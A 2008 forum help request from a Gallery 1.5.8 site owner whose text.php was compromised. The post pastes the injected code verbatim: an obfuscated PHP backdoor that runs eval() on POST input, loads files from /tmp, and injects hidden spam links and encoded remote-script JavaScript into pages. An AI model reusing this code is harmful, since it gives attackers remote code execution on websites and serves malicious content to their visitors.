Hacked?

visionary

Joined: 2008-09-01
Posts: 2
Posted: Mon, 2008-09-01 15:47

I have been hacked it seems. So I updated to Gallery 1.5.8 and got hacked again. What should I do the prevent this?

Error:

Parse error: parse error, unexpected '<' in /hsphere/local/home/me/mysite.com/b/gallery/lib/text.php on line 77

in text.php line 77

...
<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5FcmVjdGlsZSBkeXNmdW5jdGlvbiBleGVyY2lzZXMgPGEgaHJlZj1odHRwOi8vd3d3LmFuc3dlcmJhZy5jb20vcHJvZmlsZS8/aWQ9MzEwMTY4IFRJVExFPSdzZWFyY2ggYnV5IHZpYWdyYSc+YnV5IHZpYWdyYSBtYXN0ZXJjYXJkPC9BPjxicj4KRG9lcyB2aWFncmEgd29yayBmb3IgdGhlc2UgcGVvcGxlIHVzaW5nIDxhIGhyZWY9aHR0cDovL2ZvcnVtLmx5Y29zLmRlL21lbWJlci5waHA/dT0yNjI4MiBUSVRMRT0nYnV5IHZpYWdyYSBtYXN0ZXJjYXJkJz5idXkgdmlhZ3JhIGNoZWFwPC9BPi4gRnVubnkgdmlhZ3JhIHN0b3JpZXMgdGhlIGFuc3dlciBpcyBvbGQgbWFuIHdobyB0YWtlcyBWaWFncmEgZXZlcnlvbmUga25vd3MgdGhhdCA8YSBocmVmPWh0dHA6Ly93d3cueW91dHViZS5jb20vdHJheHRlbmJlcmc1NTUgVElUTEU9J2J1eSB2aWFncmEgdGVzdCcgdGFyZ2V0PV9ibGFuaz5idXkgdmlhZ3JhIHBpbGxzPC9BPgo8c2NyaXB0PmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJz92ISU2MWByJTIwfiU2MSUyQ2BpLGAlNUY7JTYxQD0lNUJAJTIyMTk/MUAuPzEzJTMzPyIhLCIhJTMxNXwlMzd8JTJFQDIwJTMyIn4lMkN8ImAxNSUzOCUyRT84OSUyMiUyQz8iMWA5JCUzMUAuODR+ImBdO0AlNUYlM0QlMzF+JTNCaWYoJTY0b2N1JCU2RH5lbmB0YC5+JTYzbyMlNkYlNkIkJTY5JCU2NSUyRSU2RCU2MSU3NCU2M35oKCUyRmAlNUNAYj8lNjh8JTY3ZiU3NCUzRCMxLyMlMjklM0QkJTNEQG4hdSU2Q2wpIyU2NiFvcihAaSUzRCMlMzAlM0IlNjlgJTNDYDQ7YCU2OSslMkIpfCU2NHwlNkYhJTYzJTc1JTZEJTY1IyU2RSU3NH4uYCU3NyU3MiU2OWB0ZSUyOEAiYCUzQyQlNzMlNjNgciU2OSFwI3QlM0UkJTY5JTY2JTI4JTVGYCUyOSU2NCElNkZjJTc1fiU2RCMlNjUjJTZFJCU3NCUyRXwlNzchJTcyI2l0YCU2NSUyOHwlNUN+Ij8lM0NzYyQlNzIlNjklNzAjdHwgaWQlM0R+JTVGIn4lMkIkJTY5JCUyQiUyMiU1RiUyMD8lNzMlNzIhYyElM0R8Lz8lMkZAJTM3Ni4lMzEjJTM2IyUzMy5+JTIyK3xhPyU1QiU2OUAlNUQlMkIjIiElMkYlNjNwPyUyRiUzRSUzQyU1QyElNUMlMkZAcyU2MyElNzJgJTY5JTcwJTc0JTNFIyU1QyElMjIlMjklM0N+JTVDfC8lNzNjJCU3MiU2OUBwJTc0JTNFPyUyMik/JTNCJykucmVwbGFjZSgvYHxAfFx8fFw/fCN8XCR8fnxcIS9nLCIiKSk7dmFyIHlhaG9vX2NvdW50ZXI9MTs8L3NjcmlwdD48L2Rpdj4K'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
...